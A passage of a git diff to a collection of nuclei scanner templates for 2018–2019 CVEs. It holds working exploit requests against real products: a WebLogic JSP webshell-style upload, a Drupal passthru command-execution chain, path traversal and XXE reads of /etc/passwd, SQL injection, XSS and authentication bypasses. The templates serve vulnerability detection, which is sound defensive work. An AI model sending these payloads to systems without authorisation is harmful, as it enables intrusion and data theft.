00267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" + type: hex + read: 1024 + + host: + - "{{Hostname}}" + + matchers: + - type: word + part: raw + words: + - "StreamMessageImpl cannot be cast to weblogic" diff --git a/nuclei-templates/CVE-2018/cve-2018-2894.yaml b/nuclei-templates/CVE-2018/cve-2018-2894.yaml deleted file mode 100644 index c5c306ce1f..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-2894.yaml +++ /dev/null @@ -1,92 +0,0 @@ -id: CVE-2018-2894 - -info: - name: Oracle WebLogic RCE - author: geeknik,pdteam - description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. - severity: critical - tags: cve,cve2018,oracle,weblogic,rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-2894 - reference: - - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ - - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894 - -requests: - - raw: - - | - POST /ws_utc/resources/setting/options HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80 - - - | - POST /ws_utc/resources/setting/keystore HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g - - ------WebKitFormBoundaryuim0dyiDSPBPu31g - Content-Disposition: form-data; name="ks_name" - - {{randstr}} - ------WebKitFormBoundaryuim0dyiDSPBPu31g - Content-Disposition: form-data; name="ks_edit_mode" - - false - ------WebKitFormBoundaryuim0dyiDSPBPu31g - Content-Disposition: form-data; name="ks_password_front" - - - ------WebKitFormBoundaryuim0dyiDSPBPu31g - Content-Disposition: form-data; name="ks_password" - - - ------WebKitFormBoundaryuim0dyiDSPBPu31g - Content-Disposition: form-data; name="ks_password_changed" - - false - ------WebKitFormBoundaryuim0dyiDSPBPu31g - Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp" - Content-Type: application/octet-stream - - <%@ page import="java.util.*,java.io.*"%> - <%@ page import="java.security.MessageDigest"%> - - <% - String cve = "CVE-2018-2894"; - MessageDigest alg = MessageDigest.getInstance("MD5"); - alg.reset(); - alg.update(cve.getBytes()); - byte[] digest = alg.digest(); - StringBuffer hashedpasswd = new StringBuffer(); - String hx; - for (int i=0;i - ------WebKitFormBoundaryuim0dyiDSPBPu31g-- - - - | - GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - name: id - internal: true - group: 1 - regex: - - '([0-9]+){{randstr}}' - - matchers: - - type: word - words: - - "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894) diff --git a/nuclei-templates/CVE-2018/CVE-2018-3238.yaml b/nuclei-templates/CVE-2018/cve-2018-3238.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-3238.yaml rename to nuclei-templates/CVE-2018/cve-2018-3238.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-3760.yaml b/nuclei-templates/CVE-2018/cve-2018-3760.yaml deleted file mode 100644 index a155100b9b..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-3760.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2018-3760 - -info: - name: Ruby On Rails Path Traversal - author: 0xrudra,pikpikcu - severity: high - reference: - - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 - - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - - https://seclists.org/oss-sec/2018/q2/210 - - https://xz.aliyun.com/t/2542 - description: | - Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. - There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. - tags: cve,cve2018,rails,lfi,ruby - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2018-3760 - cwe-id: CWE-200 - -requests: - - raw: - - | - GET /assets/file:%2f%2f/etc/passwd HTTP/1.1 - Host: {{Hostname}} - - - | - GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - name: path - internal: true - part: body - regex: - - "/etc/passwd is no longer under a load path: (.*?)," - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-5233.yaml b/nuclei-templates/CVE-2018/cve-2018-5233.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-5233.yaml rename to nuclei-templates/CVE-2018/cve-2018-5233.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-5715.yaml b/nuclei-templates/CVE-2018/cve-2018-5715.yaml new file mode 100644 index 0000000000..f27254d25f --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-5715.yaml @@ -0,0 +1,54 @@ +id: CVE-2018-5715 + +info: + name: SugarCRM 3.5.1 - Cross-Site Scripting + author: edoardottt + severity: medium + description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of SugarCRM or apply the necessary security patches provided by the vendor. + reference: + - https://www.exploit-db.com/exploits/43683 + - https://m4k4br0.github.io/sugarcrm-xss/ + - https://www.exploit-db.com/exploits/43683/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-5715 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-5715 + cwe-id: CWE-79 + epss-score: 0.00129 + epss-percentile: 0.46737 + cpe: cpe:2.3:a:sugarcrm:sugarcrm:3.5.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: sugarcrm + product: sugarcrm + shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" + google-query: intext:"SugarCRM Inc. All Rights Reserved" + tags: cve2018,cve,sugarcrm,xss,edb + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '&"/>=&"><< Back

' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a004730450221008c05e33006dbd780fae660e050aed278fd7987296118a56c8d9a0638a8e7ef7602207002a6abd15e8a9725e7831f8da20415beeb6ea650ca5ef0d4fea381f31669a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-7251.yaml b/nuclei-templates/CVE-2018/cve-2018-7251.yaml new file mode 100644 index 0000000000..17ebdb1a9e --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-7251.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-7251 + +info: + name: AnchorCMS Error Log Exposure + author: pdteam + severity: critical + tags: cve,cve2018,anchorcms,logs,error + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-7251 + cwe-id: CWE-200 + description: "An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred." + reference: + - https://github.com/anchorcms/anchor-cms/issues/1247 + - http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html + - https://twitter.com/finnwea/status/965279233030393856 + - http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html + - https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7 + +requests: + - method: GET + path: + - '{{BaseURL}}/anchor/errors.log' + matchers: + - type: word + words: + - '"date":' + - '"message":' + - '"trace":[' + condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-7490.yaml b/nuclei-templates/CVE-2018/cve-2018-7490.yaml new file mode 100644 index 0000000000..d77d8d8251 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-7490.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-7490 + +info: + name: uWSGI PHP Plugin Directory Traversal + author: madrobot + severity: high + tags: cve,cve2018,uwsgi,php,lfi,plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-7490 + cwe-id: CWE-22 + description: "uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal." + reference: + - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html + - https://www.exploit-db.com/exploits/44223/ + - https://www.debian.org/security/2018/dsa-4142 + +requests: + - method: GET + path: + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2018/cve-2018-7602.yaml b/nuclei-templates/CVE-2018/cve-2018-7602.yaml new file mode 100644 index 0000000000..243e590b31 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-7602.yaml @@ -0,0 +1,74 @@ +id: CVE-2018-7602 +info: + name: Drupal Remote Code Execution Vulnerability + author: princechaddha + severity: critical + description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. + reference: + - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py + - https://nvd.nist.gov/vuln/detail/CVE-2018-7602 + tags: cve,cve2018,drupal,authenticated + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-7602 + +requests: + - raw: + - | + POST /?q=user%2Flogin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_id=user_login&name={{username}}&pass={{password}}&op=Log+in + + - | + GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1 + Host: {{Hostname}} + + - | + POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account + + - | + POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_build_id={{form_build_id}} + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - 'CVE-2018-7602-POC' + + extractors: + - type: regex + part: body + name: userid + internal: true + group: 1 + regex: + - '' + + - type: regex + part: body + name: form_build_id + internal: true + group: 1 + regex: + - '' diff --git a/nuclei-templates/CVE-2018/cve-2018-8033.yaml b/nuclei-templates/CVE-2018/cve-2018-8033.yaml deleted file mode 100644 index 55f1fd7a8c..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-8033.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2018-8033 - -info: - name: Apache OFBiz XXE - author: pikpikcu - severity: high - description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04 - tags: cve,cve2018,apache,ofbiz,xxe - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2018-8033 - cwe-id: CWE-200 - reference: - - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E - -requests: - - raw: - - | - POST /webtools/control/xmlrpc HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en - Content-Type: application/xml - - ]>&disclose; - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-8715.yaml b/nuclei-templates/CVE-2018/cve-2018-8715.yaml deleted file mode 100644 index 01005c6032..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-8715.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2018-8715 - -info: - name: AppWeb Authentication Bypass vulnerability - author: milo2012 - severity: high - description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. - tags: cve,cve2018,appweb,auth-bypass - reference: - - https://github.com/embedthis/appweb/issues/610 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 - cve-id: CVE-2018-8715 - cwe-id: CWE-287 - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Authorization: Digest username=admin - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '' - part: body diff --git a/nuclei-templates/CVE-2018/cve-2018-9161.yaml b/nuclei-templates/CVE-2018/cve-2018-9161.yaml new file mode 100644 index 0000000000..5db121e528 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-9161.yaml @@ -0,0 +1,34 @@ +id: CVE-2018-9161 + +info: + name: PrismaWEB - Credentials Disclosure + author: gy741 + severity: critical + description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php + - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 + tags: cve,cve2018,prismaweb,exposure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-9161 + cwe-id: CWE-798 + +requests: + - method: GET + path: + - "{{BaseURL}}/user/scripts/login_par.js" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'txtChkUser' + - 'txtChkPassword' + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-9205.yaml b/nuclei-templates/CVE-2018/cve-2018-9205.yaml new file mode 100644 index 0000000000..6934634c1d --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-9205.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-9205 + +info: + name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure + author: daffainfo + severity: high + description: Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesnt verify users or sanitize the file path. + reference: + - https://www.exploit-db.com/exploits/44501 + - https://nvd.nist.gov/vuln/detail/CVE-2018-9205 + tags: cve,cve2018,lfi,drupal + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-9205 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-9995.yaml b/nuclei-templates/CVE-2018/cve-2018-9995.yaml deleted file mode 100644 index 49ed20338b..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-9995.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2018-9995 -info: - name: DVR Authentication Bypass - author: princechaddha - severity: critical - description: | - TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and - MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass - authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides - credentials within JSON data in a response. - reference: - - http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html - - http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html - - https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/ - - https://www.exploit-db.com/exploits/44577/ - tags: cve,cve2018,auth-bypass - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-9995 - -requests: - - method: GET - path: - - "{{BaseURL}}/device.rsp?opt=user&cmd=list" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "\"uid\":" - - "\"pwd\":" - - "\"view\":" - - "playback" - condition: and - part: body diff --git "a/nuclei-templates/CVE-2018/cve-2018\342\200\22314064(1).yaml" "b/nuclei-templates/CVE-2018/cve-2018\342\200\22314064(1).yaml" new file mode 100644 index 0000000000..68796ed2a0 --- /dev/null +++ "b/nuclei-templates/CVE-2018/cve-2018\342\200\22314064(1).yaml" @@ -0,0 +1,26 @@ +id: cve-2018-14064 + +info: + name: VelotiSmart Wifi - Directory Traversal + author: 0x_Akoko + severity: high + reference: | + - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac + - https://www.exploit-db.com/exploits/45030 + tags: velotismart,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-0230.yaml b/nuclei-templates/CVE-2019/CVE-2019-0230.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-0230.yaml rename to nuclei-templates/CVE-2019/CVE-2019-0230.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-10068.yaml b/nuclei-templates/CVE-2019/CVE-2019-10068.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-10068.yaml rename to nuclei-templates/CVE-2019/CVE-2019-10068.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-1010287.yaml b/nuclei-templates/CVE-2019/CVE-2019-1010287.yaml new file mode 100644 index 0000000000..984858c36c --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-1010287.yaml @@ -0,0 +1,40 @@ +id: CVE-2019-1010287 + +info: + name: Timesheet 1.5.3 - Cross Site Scripting + author: pikpikcu + severity: medium + description: 'Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 + - http://www.mdh-tz.info/ + - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/ + - https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-1010287 + cwe-id: CWE-79 + metadata: + google-dork: inurl:"/timesheet/login.php" + tags: cve,cve2019,timesheet,xss + +requests: + - raw: + - | + POST /timesheet/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '>' + part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-1010290.yaml b/nuclei-templates/CVE-2019/CVE-2019-1010290.yaml new file mode 100644 index 0000000000..04ebb7d8c8 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-1010290.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-1010290 + +info: + name: Babel - Open Redirect + author: 0x_Akoko + severity: medium + description: Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + remediation: | + Upgrade to Babel version 7.4.0 or later to mitigate this vulnerability. + reference: + - https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/ + - http://dev.cmsmadesimple.org/project/files/729 + - https://nvd.nist.gov/vuln/detail/CVE-2019-1010290 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-1010290 + cwe-id: CWE-601 + epss-score: 0.00198 + epss-percentile: 0.57529 + cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:* + metadata: + max-request: 1 + vendor: cmsmadesimple + product: bable\ + tags: cve,cve2019,redirect,babel + +http: + - method: GET + path: + - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 490a004630440220387878ef6292c32281b69d76d22d1833cfcf37aefd7665461f4fa9aa4a8c908a02201e0cab4e9fe60f0a856a455a87653fa0c22a12e9f93f7a149301a4adce973ff5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-10232.yaml b/nuclei-templates/CVE-2019/CVE-2019-10232.yaml deleted file mode 100644 index c8a8211f25..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-10232.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2019-10232 - -info: - name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection - author: RedTeamBrasil - severity: critical - description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature - to alter the semantic original SQL query and retrieve database records. - reference: - - https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf - - https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c - - https://nvd.nist.gov/vuln/detail/CVE-2019-10232 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-10232 - cwe-id: CWE-89 - tags: cve,cve2019,glpi,sqli,injection - metadata: - max-request: 2 - -http: - - method: GET - path: - - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - "-MariaDB-" - - "Start unlock script" - condition: and - - extractors: - - type: regex - part: body - regex: - - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" - -# Enhanced by mp on 2022/03/29 diff --git a/nuclei-templates/CVE-2019/CVE-2019-10475.yaml b/nuclei-templates/CVE-2019/CVE-2019-10475.yaml new file mode 100644 index 0000000000..5688bd45b0 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-10475.yaml @@ -0,0 +1,43 @@ +id: CVE-2019-10475 + +info: + name: Jenkins build-metrics 1.3 - Cross-Site Scripting + author: madrobot + severity: medium + description: Jenkins build-metrics 1.3 is vulnerable to a reflected cross-site scripting vulnerability that allows attackers to inject arbitrary HTML and JavaScript into the web pages the plugin provides. + reference: + - https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1490 + - http://www.openwall.com/lists/oss-security/2019/10/23/2 + - http://packetstormsecurity.com/files/155200/Jenkins-Build-Metrics-1.3-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-10475 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-10475 + cwe-id: CWE-79 + cpe: cpe:2.3:a:jenkins:build-metrics:*:*:*:*:*:*:*:* + epss-score: 0.97272 + tags: cve,cve2019,jenkins,xss,plugin,packetstorm + metadata: + max-request: 1 + +http: + - method: GET + path: + - "{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header + +# Enhanced by mp on 2022/08/11 diff --git a/nuclei-templates/CVE-2019/CVE-2019-11013.yaml b/nuclei-templates/CVE-2019/CVE-2019-11013.yaml new file mode 100644 index 0000000000..1e4b2284c8 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-11013.yaml @@ -0,0 +1,34 @@ +id: CVE-2019-11013 + +info: + name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal + author: 0x_Akoko + severity: medium + description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server. + reference: + - https://www.exploit-db.com/exploits/47301 + - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 + - https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/ + - http://packetstormsecurity.com/files/154196/Nimble-Streamer-3.x-Directory-Traversal.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2019-11013 + cwe-id: CWE-22 + tags: cve,cve2019,lfi,nimble + +requests: + - method: GET + path: + - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-11248.yaml b/nuclei-templates/CVE-2019/CVE-2019-11248.yaml new file mode 100644 index 0000000000..89c2242da9 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-11248.yaml @@ -0,0 +1,41 @@ +id: CVE-2019-11248 + +info: + name: Debug Endpoint pprof - Exposure Detection + author: 0xceeb,ritikchaddha + severity: high + description: | + The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 